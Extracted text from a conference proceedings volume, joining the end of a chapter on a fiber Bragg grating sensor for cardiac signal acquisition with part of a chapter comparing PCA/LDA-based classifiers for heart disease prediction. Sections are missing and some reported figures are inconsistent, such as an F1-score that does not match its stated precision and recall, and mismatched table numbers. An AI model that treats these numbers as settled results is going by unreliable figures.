(FEA). Further, the bonding of the FBG sensor element is discussed in this article
with adequate design specifications. In addition to the FBG sensor design consid-
erations, the real-time acquisition of the cardiac signal is also experimented with in
this research work to validate the sensor performance. Finally, the architecture of a
cardiac monitoring approach by utilizing the Internet of things (IoT) and machine
learning (ML) is proposed in this article.
A. G. Mohapatra (B)
Department of Electronics and Instrumentation Engineering, Silicon Institute of Technology,
Bhubaneswar, Odisha, India
P. K. Tripathy
Department of Computer Science & Engineering, Silicon Institute of Technology, Bhubaneswar,
Odisha, India
M. Mohanty
SSC, Puri, Odisha, India
A. Khanna
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: ashishkhanna@mait.ac.in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 711
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_57
712 A. G. Mohapatra et al.
1 Introduction
2 Literature Review
during respiration. In a similar context, Dziuda et al. describe signals obtained from an FBG strain sensor, fabricated on a polymethyl substrate, that is placed inside a bed mattress. A moving average filter is used to obtain RR and HR [2]. The sensor signal is affected by the motion of the chest and is also influenced by body position, coughing, and displacement of the bed. The total error of the system is less than 8. FBG sensors are passive sensors suitable for various critical applications [3]. Similarly, Fajkus et al. describe a non-invasive probe based on two FBGs encapsulated inside polydimethylsiloxane (PDMS) and observed that the polymer increases the sensitivity of the probe fourfold. A wavelength-division technique is used for the spectral separation of the individual gratings to measure RR, HR, and body temperature [4]. The relative error is 3.9% for RR and 0.36% for body temperature. Dziuda et al. present an FBG written on an optical fiber that is placed inside a pneumatic cushion; a Fabry–Perot filter is used in the sensing interrogation setup to analyze the FBG signals and detect HR and RR [5]. Breathing induces a dynamic strain of up to 24.8 µε on the FBG and HR induces approximately 8.3 µε; the sensor gives a maximum relative error of 14%. Dziuda et al. also describe an FBG sensor placed inside a pneumatic cushion, where a moving average method is used to detect HR and RR after the FBG signal is filtered by a Fabry–Perot, spectrally scanning filter [6]. A strain of 0–12.4 µε is induced on the FBG sensing element by breathing and about 8.3 µε by HR, and the maximum relative error of the sensor is 12%. Wo et al. [7] present a pair of FBGs inscribed in an Er-doped fiber; the respiration rate is measured from the variation of the beat signal between the dual polarizations of the packaged fiber laser. De Jonckheere presents an FBG-based smart textile that undergoes an elongation of 0.1–5% during breathing; a spectroscopic technique with an optical spectrum analyzer (OSA) is used to detect HR and RR [8]. Wehrle presents an FBG strain sensor placed inside a belt, where a fixed filter with an OSA is used to detect the respiratory frequency spectrum and ventilator movement. Silva describes a single FBG sensor located inside a polymeric foil to detect RR and HR [9]; a bilinear technique with two bandpass filters is applied in the digital domain [10]. Elsarnagawy describes an FBG sensor embedded into a nylon textile, with two bandpass filters in the ranges 0.1–0.4 Hz for RR and 0.8–1.6 Hz for HR [11]. Dziuda et al. present an FBG sensor adhered to a 95 × 220 × 1.5 mm Plexiglas plate placed inside a bed mattress [12]; a low-pass filter with a cut-off frequency of 60 Hz is used to detect RR and HR. The above review of FBG sensors concludes that there is plenty of room at the bottom, i.e., in the development of high-precision passive sensor elements.
3 Background
The FBG sensor element works on the principle of light traveling inside the core of an optical fiber. The wavelength of light reflected by the FBG element is modulated by the external strain and temperature acting on the grating region. The fabrication of the FBG sensor element and its basic working principle are discussed in this section.
The fabrication of the FBG sensor element for the acquisition of cardiac vibrations is performed by following an experimental procedure in the laboratory. Ultraviolet light is focused on an optical fiber to develop a periodic grating structure in the silica fiber. The resulting periodic change in the refractive index of the photosensitive core of the optical fiber is called a Bragg grating. During sensor design, the Bragg grating is treated as a sensing element by multiplexing several such gratings along the optical fiber. The type of grating depends on the photosensitivity mechanism by which the fringes are produced in the fiber. The working principle of FBG sensing devices is discussed in the next section of the article.
A fiber Bragg grating sensor introduces a periodic modulation of the refractive index along the propagation axis of the optical fiber [13, 14]. This periodic structure acts as a highly wavelength-selective reflection filter. When intense laser light is incident on the sensor, the partial reflections combine to form one large reflection at a wavelength called the Bragg wavelength, and the condition is called the Bragg condition, as shown in Fig. 1 [15, 16]. According to coupled-mode theory, the Bragg wavelength is given by Eq. 1.
λB = 2ηeff Λ (1)

where

ηeff is the effective refractive index of the fiber core.
Λ is the grating period.
The reflected wavelength shift depends on both strain and temperature [17]. From the above equation, once the fiber Bragg grating material is chosen for the sensor design, its strain sensitivity coefficient and temperature sensitivity coefficient are used for sensing [7, 17].
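As a numerical illustration of Eq. 1 and of the strain–temperature dependence of the reflected wavelength, the sketch below computes the Bragg wavelength and its shift. The input values (ηeff = 1.447, Λ = 535.5 nm) and the default photoelastic and thermal coefficients are typical literature values for silica fiber assumed here for illustration; they are not parameters reported in this article.

```python
def bragg_wavelength(eta_eff, period):
    """Eq. 1: lambda_B = 2 * eta_eff * Lambda."""
    return 2.0 * eta_eff * period

def bragg_shift(lambda_b, strain=0.0, delta_t=0.0,
                p_e=0.22, alpha=0.55e-6, xi=8.6e-6):
    """Wavelength shift for a given strain (dimensionless) and temperature change (deg C).

    Standard relation: d(lambda)/lambda = (1 - p_e)*strain + (alpha + xi)*delta_t,
    with typical silica-fiber coefficients as defaults (assumed values).
    """
    return lambda_b * ((1.0 - p_e) * strain + (alpha + xi) * delta_t)

# Example: eta_eff = 1.447, grating period = 535.5 nm -> lambda_B ~ 1549.7 nm
lam_b = bragg_wavelength(1.447, 535.5e-9)
d_lam = bragg_shift(lam_b, strain=1e-6)  # shift for 1 microstrain
```

A strain of one microstrain thus shifts the reflected wavelength by roughly a picometer, which is why high-resolution interrogators are needed for cardiac-scale vibrations.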
The FEA model of the sensor element is designed in the COMSOL Multiphysics software, and a complete structural analysis is performed. COMSOL Multiphysics supports the simulation of designs involving coupled physics, mechanics, acoustics, electromagnetics, fluid flow, heat transfer, chemical reactions, etc., as well as the preparation of easy-to-use simulation apps.
The following analysis is performed using the COMSOL software.
• Single-physics and arbitrary multiphysics analyses.
• High-performance meshing and numerical analysis.
• Post-processing of the sensor structure.
The different analyses performed on the sensor element are shown in Figs. 2, 3, 4,
and 5. The 3D structure designed using the FEA software is shown in Fig. 2a. The size,
material, and other design considerations used in the FEA model are listed in Tables 1
and 2. Similarly, the 3D meshing of the FEA model is shown in Fig. 2b. Further, the
Fig. 2 3D model and 3D meshing of the polymer layer embedded on the FBG element
Fig. 3 Contour of total displacement and deformation profile along with force direction
Fig. 5 LabVIEW graphical user interface (GUI) for real-time signal acquisition and acquired signal
Table 2 Design configurations of the sensor element

Simulation configuration | Parameter
Material | Polydimethylsiloxane (PDMS)
Applied frequency | 0.33 Hz
Acts/min | 20 acts per minute
total deformation of the material layer is evaluated using the FEA simulation, and
the contour of the deformation profile is shown in Fig. 3a. Similarly, the contour of
the total deformation/displacement in the meter is shown in Fig. 3b.
The deformation profile of the PDMS layer shown in Fig. 4a makes it clear that the deformation is maximum at the center region of the 3D element. The FBG sensor element is therefore bonded to the center region of the PDMS deposition to obtain maximum sensitivity. Figure 4b shows a snapshot of the fabricated sensor element.
The signal recording from the fabricated sensor element is performed using a software application developed on the National Instruments LabVIEW platform. Initially, an SLED optical light source is used, and an FBG interrogator is used to receive the reflected wavelength. A LabVIEW application is developed to estimate the peak wavelength from the raw signal recorded by the FBG interrogator. Figure 5a shows the GUI of the application software developed at the laboratory. Further, the fabricated FBG sensor is tested using a similar procedure by fixing it on the chest of a test subject at the laboratory. The cardiac signal of the test subject is recorded using the LabVIEW application. Figure 5b shows the real-time raw cardiac signal recorded using the fabricated FBG sensor element. It is observed that the recorded signal contains additional noise components, and the P, Q, S, and T waves are largely affected by them, whereas the R-wave is clearly visible and can be further analyzed to estimate the useful cardiac parameters of a patient under test.
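Since the R-wave is the only component that survives the noise, a heart-rate estimate can be derived from the R-R intervals. The article does not specify its processing pipeline, so the following is only a minimal sketch: a naive thresholded local-maximum picker followed by averaging of the R-R intervals, with the threshold and sampling rate as assumed parameters.

```python
def detect_r_peaks(signal, threshold):
    """Return indices of local maxima above `threshold` (a naive R-peak picker)."""
    peaks = []
    for i in range(1, len(signal) - 1):
        if signal[i] > threshold and signal[i] >= signal[i - 1] and signal[i] > signal[i + 1]:
            peaks.append(i)
    return peaks

def heart_rate_bpm(peak_indices, fs):
    """Mean heart rate (beats/min) from successive R-R intervals at sampling rate fs (Hz)."""
    if len(peak_indices) < 2:
        return None
    rr = [(b - a) / fs for a, b in zip(peak_indices, peak_indices[1:])]
    return 60.0 / (sum(rr) / len(rr))

# Toy signal: three sharp "R-waves" one second apart at fs = 100 Hz
fs = 100
sig = [0.0] * 300
for k in (10, 110, 210):
    sig[k] = 1.0
bpm = heart_rate_bpm(detect_r_peaks(sig, threshold=0.5), fs)  # -> 60.0
```

A real signal would first need band-pass filtering to suppress the noise components mentioned above before such a peak picker becomes reliable.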
5 Conclusions
The finite element analysis method is used to formulate the design of a fiber Bragg
grating sensor for the real-time acquisition of cardiovascular parameters like heart
rate, respiration rate, oxygen concentration, and chest expansion. It is observed that
the PDMS polymer material is best suitable for the acquisition of the real-time
cardiac signal of the patient under medical examination. The individual responses
of the sensor element are evaluated successfully in the experimental study. The real-
time cardiac signal is also acquired using the fabricated FBG sensor element which
gives a clear picture of the R-wave of the cardiac signal pattern. The P, Q, S, and
T waves can also be estimated from the raw signal using robust signal processing
or machine learning techniques. The fabricated sensor element can be used with
the Internet of things (IoT) platform for the monitoring of cardiac parameters of the
patient under MRI test.
Acknowledgements The authors thank the Silicon Institute of Technology, Bhubaneswar, and the Central Glass and Ceramic Research Institute (CGCRI), Kolkata, for providing continuous support in fabricating the FBG sensor during the research work. The authors also thank the Silicon Institute of Technology, Bhubaneswar, for providing licensed software such as LabVIEW and COMSOL Multiphysics and the FBG interrogator used to conduct this experiment successfully. We would like to acknowledge the financial support received under the research project grant scheme TEQIP-III Biju Patnaik University of Technology (BPUT) Collaborative Research and Innovation Scheme (CRIS) vide Letter No. BPUT-
XIX-TEQIP-III/17/19/119 Dated: 08/11/2019. This work is a part of the Indian Patent filed vide
Ref. No. 202131001862 on/at Date/Time: 2021/01/14 22:58:13 (IST) under Intellectual Property
(IP) India.
References
1. Koivistoinen, T., Junnila, S., Varri, A., & Koobi, T. (2004). A new method for measuring the ballistocardiogram using EMFi sensors in a normal chair. In The 26th Annual International Conference of the IEEE Engineering in Medicine and Biology Society (pp. 2026–2029).
2. Dziuda, L., Krej, M., & Skibniewski, F. W. (2013). Fiber Bragg grating sensor incorporated to monitor patient vital signs during MRI. IEEE Sensors Journal, 13(12).
3. Paulo Carmo, J., & da Silva, A. M. F. (2012). Application of fiber Bragg gratings on wearable garments. IEEE Sensors Journal, 12(12).
4. Fajkus, M., Nedoma, J., Martinek, R., Vasinek, V., Nazeran, H., & Siska, P. (2017). A non-invasive multichannel hybrid fiber-optic sensor system for vital sign monitoring. Sensors.
5. Dziuda, L., Skibniewski, F., Rozanowski, K., Krej, M., & Lewandowski, J. (2011). Fiber-optic sensor for respiration and cardiac activity. IEEE.
6. Dziuda, L., Skibniewski, F. W., Krej, M., & Lewandowski, J. (2012). Monitoring respiration and cardiac activity using fiber Bragg grating-based sensor. IEEE Transactions on Biomedical Engineering, 59(7).
7. Wo, J., Wang, H., Sun, Q., Shum, P. P., & Liu, D. (2014). Noninvasive respiration movement sensor based on distributed Bragg reflector fiber laser with beat frequency interrogation. Journal of Biomedical Optics, 19(1).
8. De Jonckheere, J., Narbonneau, F., D'Angelo, L. T., Witt, J., Paquet, B., Kinet, D., Krebber, K., & Logier, R. (2010). FBG-based smart textiles for continuous monitoring of respiratory movements for healthcare application. IEEE.
9. Silva, A. F., Carmo, J. P., Mendes, P. M., & Correia, J. H. (2011). Simultaneous cardiac and respiratory frequency measurement based on single fiber Bragg grating sensor. Measurement Science and Technology.
10. Wehrle, G., Nohama, P., Kalinowski, H. J., Torres, P. I., & Valente, L. C. G. (2001). A fiber optic Bragg grating sensor for monitoring ventilator movements. Measurement Science and Technology, 805–809.
11. Elsarnagawy, T. (2015). A simultaneous and validated FBG heartbeat and respiration rate monitoring system. Sensor Letters, 13, 1–4.
12. Dziuda, L., Lewandowski, J., Skibniewski, F., & Nowicki, G. (2012). Fiber-optic sensor for respiration and heart rate monitoring in the MRI environment.
13. Krej, M., Baran, P., & Dziuda, L. (2019). Detection of respiratory rate using a classifier of waves in the signal from an FBG-based vital signs sensor. Elsevier.
14. De Jonckheere, J., Jeanne, M., Grillet, A., Weber, S., Chaud, P., Logier, R., & Weber, J. L. (2007). OFSETH: Optical fiber embedded into technical textile for healthcare, an efficient way to monitor patient under magnetic resonance imaging. In Annual International Conference of the IEEE Engineering in Medicine and Biology Society.
15. Gurkan, D., Starodubov, D., & Yuan, X. (2005). Monitoring of the heartbeat sounds using an optical fiber Bragg grating sensor. IEEE.
16. Hao, J., Jayachandran, M., Kng, P. L., Foo, S. F., Aung, P. W. A., & Cai, Z. (2009). FBG-based smart bed system for healthcare applications. Optoelectron China, 3(2), 78–83.
17. Mohapatra, A. G., Khanna, A., Gupta, D., Mohanty, M., & de Albuquerque, V. H. C. (2020). An experimental approach to evaluate machine learning models for the estimation of load distribution on suspension bridge using FBG sensors and IoT. Computational Intelligence.
Early-Stage Coronary Ailment
Prediction Using Dimensionality
Reduction and Data Mining Techniques
1 Introduction
Data mining is the process of identifying hidden patterns and trends in a database and using that vital information to construct predictive models. In the healthcare industry, data mining has become very popular for detecting diseases [1].
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 721
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_58
722 K. Dutta et al.
about the methodology and materials, which explain the data inspection and feature extraction. Sections 3.1 and 3.2 describe the various algorithms implemented in the paper. Section 4 comprises the results, scrutiny, and comparison of the models. Section 5 presents the conclusion and future work.
2 Related Works
Rajkumar et al. (2010) researched forecasting whether a person has a cardiovascular illness or not. They collected a dataset from the UCI repository having 303 instances and 13 attributes. They used KNN, decision list, and Naïve Bayes for classification and found that Naïve Bayes obtained 52.33% accuracy, while the decision list and KNN obtained 52% and 45.67% accuracy, respectively [13]. Kangwanariyakul et al. (2010) used different neural network data mining techniques and the support vector machine (SVM) to build automated technology for classifying ischemic heart disease (IHD) patients. They obtained the dataset by measuring the cardiac magnetic fields at 36 locations (6 × 6 matrices) above the torso. They found that the Bayesian neural network (BNN) and the back-propagation neural network (BPNN) were the best models with 78.43% accuracy, while SVM (RBF kernel) obtained the least accuracy of 60.78%. Sensitivity was highest for BNN at 96.55%, while SVM (RBF kernel) had the least sensitivity of 41.38%. The RBF-kernel SVM and the polynomial-kernel SVM displayed the maximum and minimum specificity of 86.36% and 45.45%, respectively [14].
Nayak et al. (2019) conducted research on a dataset taken from the UCI repository having 303 instances with 14 attributes, including the target variable. They used various machine learning algorithms such as decision tree, SVM, Naïve Bayes, and KNN. They found that Naïve Bayes and SVM achieved 88.67% and 81.13% accuracy, respectively, while KNN had the least accuracy at only 67.92% [15]. Then, Mohan et al. (2019) put forward a novel method for increasing the accuracy of cardiovascular disease prediction, named hybrid random forest with a linear model (HRFLM). In addition to HRFLM, they also applied support vector machine, random forest, decision tree, recurrent fuzzy neural network (RFNN), logistic regression, Naïve Bayes, deep learning, and ensemble methods. Their research was based on the Cleveland heart disease dataset from the UCI repository, having 297 instances with 13 attributes. Their proposed model HRFLM obtained the highest accuracy of 88.4%, while the voting classifier and SVM also performed well with 87.41% and 86.1%. The Naïve Bayes algorithm had the lowest accuracy of 75.8% [6].
Thomas et al. (2016) surveyed different classification algorithms for predicting the possibility of heart disease for each person based on 13 attributes such as gender, age, cholesterol, pulse rate, and blood pressure. They used various machine learning techniques such as neural network, KNN, Naïve Bayes, and decision tree on different numbers of attributes. They concluded that the accuracy of the algorithms increased when a greater number of attributes was used [16]. Buettner et al. (2019) worked on predicting heart disease with a random forest classifier on the Cleveland dataset, which has 303 instances with 13 attributes. They trained the model with tenfold cross-validation and also without it. They found that the four categories of chest pain type (atypical anginal, asymptomatic, nonanginal, and typical anginal), heart disease status, and the number of major vessels were very important for heart disease classification. The model achieved an accuracy of 84.448% with cross-validation and 82.895% without cross-validation [17]. Banu et al. (2014) discussed clustering techniques such as k-means clustering, association rule learning such as the Maximal Frequent Itemset Algorithm (MAFIA), and classification techniques such as decision tree, Naïve Bayes, neural network, and the C4.5 algorithm for exploring heart disease. They found that k-means-based MAFIA with ID3 and C4.5 was the best model, with an accuracy of 89% [18]. Waghulde et al. (2014) demonstrated the genetic neural network technique for heart disease prediction using the Cleveland dataset and obtained 98% accuracy [19].
Machine learning and data mining have become some of the most advanced technologies in the healthcare sector [20, 21]. With the help of machine learning or deep learning, many diseases can be predicted in real time, and the entire health industry can benefit from it. This paper deals with predicting whether a person has heart or cardiovascular disease or not. Data classification algorithms such as artificial neural network (ANN), decision tree, random forest, KNN, SVM, logistic regression, and ensemble methods were applied for detecting whether a person has a heart problem or not, as shown in Fig. 1.
ANN is a computational or mathematical model inspired by the human nervous system [22]. ANN has the unique feature of establishing a relationship between dependent and independent variables, pulling out vital information and complex knowledge from datasets. An ANN consists of input and output layer nodes connected through hidden nodes, with weights assigned to each connection. Hidden layer nodes apply activation functions to pass information forward to the output nodes [23].

Logistic regression is mainly used to predict the assignment of the input to a selected set of classes. The logistic sigmoid function is generally used to transform the output in classification [24]. A linear equation is taken as input in logistic regression, and the sigmoid function then performs the task of binary classification.

KNN is a non-parametric algorithm in which the number of neighbors (k) is chosen. Generally, the Euclidean distance is used for the identification. After the distances are calculated, they must be sorted in increasing order. Then, the most frequent class among the k nearest rows is taken to return the predicted value [25].

To maximize predictive accuracy, two principles underlie the support vector machine: structural risk minimization (SRM) and empirical risk minimization (ERM). SRM decreases an upper bound on the expected risk, whereas ERM decreases the error on the training data. In the SVM algorithm, every data point is plotted as a point in n-dimensional space. The classification then proceeds by searching for the hyperplane that best separates the two classes. SVM does not perform well on noisy datasets [26].

A collection of algorithms based on Bayes' theorem together forms the Naïve Bayes classifier. These algorithms share a common principle: every pair of features being classified is independent of each other.

The decision tree classifier [27] is like an if-else condition. A condition is applied at each node of the tree, which then leads either to an internal node or to a leaf node. The algorithm works recursively, choosing the best dividing criterion for the dataset to build the tree. One main advantage of the decision tree algorithm is that, compared to other algorithms, it requires less effort for data preparation during pre-processing. Noisy data and overfitting are handled by pruning the trees.

The random forest classifier [28] creates a set of decision trees that collect votes from randomly chosen sub-groups of the training set to determine the class of the test object. The random forest classifier includes extra randomness in the model while growing the trees: instead of searching for the most important attribute when splitting, it selects the best attribute within a random subset. One of the main disadvantages of the random forest classifier is its tendency to overfit, so tuning of the hyperparameters is necessary.

The Passive Aggressive algorithm is an incremental learning algorithm. The main idea of this classifier is that it adjusts its weight vector for every misclassified training sample. The name comprises two words: "passive" indicates that if the prediction is correct, no changes are made to the model, while "aggressive" indicates that if the prediction is incorrect, changes are made to correct the model [29].

AdaBoost is an ensemble meta-algorithm. Its main aim is to build a strong classifier from many weak classifiers. For binary classification problems, AdaBoost is considered the first successful boosting algorithm. In parallel ensemble methods, base learners are created in parallel, whereas in sequential methods, learners are generated sequentially [30]. The AdaBoost model is trained iteratively through the selection of the training set on the basis of accuracy: higher weights are assigned to misclassified instances so that their probability of selection increases in the next iterations. Simultaneously, a weight is assigned to each classifier at every iteration depending on its accuracy. The process is iterated until the whole training data fits without major fault [31].

An interesting ensemble solution, which can be considered a subset of stacking, is offered by the voting classifier, in which several algorithms are evaluated in parallel to exploit their individual strengths. Two different strategies are followed: hard voting, in which the class that receives the highest number of votes is chosen, and soft voting, in which the probability vectors for each predicted class are summed over all classifiers [32].
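The two voting strategies described above can be sketched in a few lines of pure Python (a minimal illustration, not the library implementation the paper presumably used): `hard_vote` takes one predicted label per classifier, and `soft_vote` takes one per-class probability vector per classifier.

```python
from collections import Counter

def hard_vote(labels):
    """Hard voting: return the class label predicted by the most classifiers."""
    return Counter(labels).most_common(1)[0][0]

def soft_vote(prob_vectors):
    """Soft voting: sum the per-class probability vectors of all classifiers
    and return the index of the class with the largest total."""
    totals = [sum(cls_probs) for cls_probs in zip(*prob_vectors)]
    return max(range(len(totals)), key=totals.__getitem__)

# Three hypothetical classifiers voting on a binary outcome (0 = healthy, 1 = disease)
hard = hard_vote([1, 0, 1])                             # -> 1
soft = soft_vote([[0.6, 0.4], [0.4, 0.6], [0.3, 0.7]])  # -> 1
```

Note that the two strategies can disagree: a classifier that is very confident can outweigh two mildly confident opponents under soft voting but not under hard voting.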
Exploring the dataset is one of the important parts of applying machine learning algorithms, as it helps us study the statistics and classes of the data. The dataset has been collected from Kaggle [33] in CSV format and includes 303 patient records with 13 attributes and 1 target variable. The dataset was divided into two parts, i.e., 30% for testing and 70% for training. Figure 2 shows the correlation graph of the dataset.
Selecting the minimum number of attributes for training the model plays a very important part in data mining and machine learning, as it decreases the computation cost and improves the performance of the algorithm [34, 35]. This paper uses two dimensionality reduction techniques, LDA and PCA.
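The idea behind PCA, projecting the data onto the directions of maximum variance, can be illustrated with a pure-Python two-feature sketch (a real experiment would use a library implementation on the full 13-attribute dataset; the function name and the toy points below are purely illustrative).

```python
def pca_first_component(points):
    """Project 2-D points onto their first principal component (pure-Python sketch)."""
    n = len(points)
    mx = sum(x for x, _ in points) / n
    my = sum(y for _, y in points) / n
    # sample covariance matrix [[sxx, sxy], [sxy, syy]]
    sxx = sum((x - mx) ** 2 for x, _ in points) / (n - 1)
    syy = sum((y - my) ** 2 for _, y in points) / (n - 1)
    sxy = sum((x - mx) * (y - my) for x, y in points) / (n - 1)
    # leading eigenvalue of the 2x2 covariance matrix
    tr, det = sxx + syy, sxx * syy - sxy * sxy
    lam = tr / 2 + ((tr / 2) ** 2 - det) ** 0.5
    # corresponding eigenvector (handle the axis-aligned case separately)
    if abs(sxy) > 1e-12:
        vx, vy = sxy, lam - sxx
    else:
        vx, vy = (1.0, 0.0) if sxx >= syy else (0.0, 1.0)
    norm = (vx * vx + vy * vy) ** 0.5
    vx, vy = vx / norm, vy / norm
    # centered projection of every point onto the component
    return [(x - mx) * vx + (y - my) * vy for x, y in points]

# Points lying on the line y = x collapse to one dimension without information loss
scores = pca_first_component([(0, 0), (1, 1), (2, 2), (3, 3)])
```

LDA differs in that it uses the class labels, choosing the projection that best separates the classes rather than the one that preserves the most variance.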
4 Results

The performance of the different classifiers needs to be evaluated to assess their correctness on the test dataset and to select the best model. The performance of the algorithms can be described by evaluating different metrics such as precision, recall, F1-score, AUC score, accuracy, and balanced accuracy (BAC), obtained from the confusion matrix, which has four outcomes. Table 1 shows the confusion matrix of all the classifiers used in the paper. Tables 2 and 3 show the performance of the various metrics for LDA and PCA, respectively. The performance of the different models with respect to the evaluation metrics is shown graphically in Figs. 3 and 4.
The different evaluation metrics can be calculated with the help of the confusion matrix [39, 40]. The mathematical equations for the various metrics are given in Eqs. 1–4.

Accuracy = (Tp + Tn) / (Tp + Tn + Fp + Fn) (1)

Precision = Tp / (Tp + Fp) (2)

Recall = Tp / (Tp + Fn) (3)

F1-score = 2 × (P × R) / (P + R) (4)

where Tp is the true positive, Tn refers to true negative, Fp is the false positive, Fn means false negative, P refers to precision, and R is the recall.
AUC = (SP − PE(NO + 1)/2) / (PE × NO) (5)

where NO is the number of negative observations, PE is the number of positive examples, and SP refers to the sum of positive observations.
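Eqs. 1–4 can be computed directly from the four confusion-matrix counts; a minimal sketch (the counts below are illustrative, not taken from the paper's confusion matrices):

```python
def classification_metrics(tp, tn, fp, fn):
    """Accuracy, precision, recall, and F1-score from confusion-matrix counts (Eqs. 1-4)."""
    accuracy = (tp + tn) / (tp + tn + fp + fn)
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    return accuracy, precision, recall, f1

# Illustrative counts for a ~90-patient test split
acc, prec, rec, f1 = classification_metrics(tp=40, tn=35, fp=5, fn=6)
```

Since the F1-score is the harmonic mean of precision and recall, it always lies between the two and is pulled toward the smaller value, which is why it is preferred over accuracy on imbalanced classes.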
Table 3 shows the results of the different algorithms trained with Principal Component Analysis (PCA). It has been observed that the artificial neural network (ANN) performed well on the dataset, with 88.52% accuracy, 88.56% recall, 88.31% precision, and 88.41% F1-score. Logistic regression, SVC, and the voting classifier also performed well, with 86.89% accuracy, 86.33% recall, 87.06% precision, and 86.59% F1-score. K-Nearest Neighbors did not perform well, as it achieved 65.57% accuracy, 66.07% recall, 65.89% precision, and 65.54% F1-score. Table 4 shows the results of the different algorithms trained with LDA. It has been observed that the artificial neural network (ANN) performed well on the dataset, with 85.24% accuracy, 84.61% recall, 81.48% precision, and 83.01% F1-score. Logistic regression, SVC, and the voting classifier also performed well, with 83.61% accuracy, 83.01% recall, 83.67% precision, and 83.24% F1-score. The Passive Aggressive Classifier did not perform well, as it achieved 60.66% accuracy, 55.56% recall, 46.96% F1-score, and 79.31% precision.
Data mining in the healthcare industry is unlike that in other sectors, as the available datasets are heterogeneous and certain social, legal, and ethical restrictions apply to
medical information. The primary motivation of this paper is to provide more insight into cardiovascular disease prediction, as it is a very important and challenging task for healthcare organizations. If heart disease is detected at an early stage and medication is administered, the mortality rate can be reduced drastically. Various machine learning and deep learning algorithms such as ANN, random forest, decision tree, AdaBoost, Naïve Bayes, KNN, SVM, voting classifier, logistic regression, and Passive Aggressive have been trained with the PCA and LDA dimensionality reduction techniques for efficacious and efficient heart disease diagnosis. The best algorithm was the artificial neural network, which achieved 88.52% accuracy when trained with PCA and 85.24% accuracy when trained with LDA.

In the future, the research can be extended with more data mining algorithms to predict the disease more accurately and efficiently. The dataset can be enlarged for better prediction. Various techniques such as clustering, e.g., k-means, also need to be explored for simplicity and better efficiency.
References
1. Bhatla, N., & Jyoti, K. (2012). An analysis of heart disease prediction using different data
mining techniques. International Journal Engineering Research and Technology, 1(8), 1–4.
2. Palaniappan, S., & Awang, R. (2008). Intelligent heart disease prediction system using data
mining techniques. AICCSA 08—6th IEEE/ACS international conference on computer systems
and applications (pp. 108–115). doi: https://doi.org/10.1109/AICCSA.2008.4493524.
3. Jalali, S. M. J., Karimi, M., Khosravi, A., & Nahavandi, S. (2019). An efficient neuroevolution
approach for heart disease detection. In 2019 IEEE international conference on Systems, Man
and Cybernetics (SMC), (vol. 77, no. 1, pp. 3771–3776). doi: https://doi.org/10.1109/SMC.
2019.8913997.
4. Alzubi, J. A., Kumar, A., Alzubi, O. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 10(2), 267. https://doi.org/10.5958/0976-5506.2019.00298.5
5. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies, 11(3), 531–538.
6. Mohan, S., Thirumalai, C., & Srivastava, G. (2019). Effective heart disease prediction using
hybrid machine learning techniques. IEEE Access, 7, 81542–81554. https://doi.org/10.1109/
ACCESS.2019.2923707
7. Dangare, C. S., & Apte, S. S. (2012). Improved study of heart disease prediction system using
data mining classification techniques. International Journal of Computers and Applications,
47(10), 44–48. https://doi.org/10.5120/7228-0076
8. Ramalingam, V. V., Dandapath, A., Karthik Raja, M. (2018). Heart disease prediction using
machine learning techniques: A survey. International Journal of Engineering and Technology,
7(2.8), 684–687. doi: https://doi.org/10.14419/ijet.v7i2.8.10557.
9. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2020). Comparative analysis of
heart disease classification algorithms using big data analytical tool. 582–588.
10. Jee, G., Harshvardhan, G., & Gourisaria, M. K. (2021). Juxtaposing inference capabilities of
deep neural models over posteroanterior chest radiographs facilitating COVID-19 detection.
Journal of Interdisciplinary Mathematics 1–27. doi: https://doi.org/10.1080/09720502.2020.
1838061.
732 K. Dutta et al.
11. Atallah, R., & Al-Mousa, A. (2019). Heart disease detection using machine learning majority
voting ensemble method. In 2019 2nd International Conference on new Trends in Computing
Sciences (ICTCS) (pp 1–6). doi: https://doi.org/10.1109/ICTCS.2019.8923053.
12. Nayak, S., Kumar Gourisaria, M., Pandey, M., & Swarup Rautaray, S. (2019). Heart disease
prediction using frequent item set mining and classification technique. International Journal
of Information Engineering and Electronic Business, 11(6), 9–15. doi: https://doi.org/10.5815/
ijieeb.2019.06.02.
13. Rajkumar, A., & Reena, G. S. (2010). Diagnosis of heart disease using datamining algorithm.
Global Jounal Computer Science and Technology, 10(10), 38–43.
14. Kangwanariyakul, Y., Nantasenamat, C., Tantimongcolwat, T., & Naenna, T. (2010). Data
mining of magnetocardiograms for prediction of ischemic heart disease. EXCLI Journal, 9,
82–95. doi: https://doi.org/10.17877/DE290R-15805.
15. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2019). Prediction of heart disease
by mining frequent items and classification techniques. In 2019 International conference on
Intelligent Computing and Control Systems (ICCS) (pp. 607–611). doi: https://doi.org/10.1109/
ICCS45141.2019.9065805.
16. Princy, R. T., & Thomas, J. (2017). Human heart disease prediction system using data mining
techniques. In Proceedings of the IEEE International Conference on Circuit, Power and
Computing Technologies (ICCPCT) 2017.
17. Buettner, R., & Schunter, M. (2019). Efficient machine learning based detection of heart
disease. 2019 IEEE international conference on E-health networking, application & services
(HealthCom) 2019. doi: https://doi.org/10.1109/HealthCom46333.2019.9009429.
18. Nishara Banu, M. A., & Gomathy, B. (2014). Disease forecasting system using data mining
methods. In International Conference on Intelligent Computing Applications (ICICA) 2014
(pp. 130–133). doi: https://doi.org/10.1109/ICICA.2014.36.
19. Waghulde, N. P., & Patil, N. P. (2014). Genetic neural approach for heart disease prediction.
International Journal of Advanced Computer Research, 4(3), 778–784.
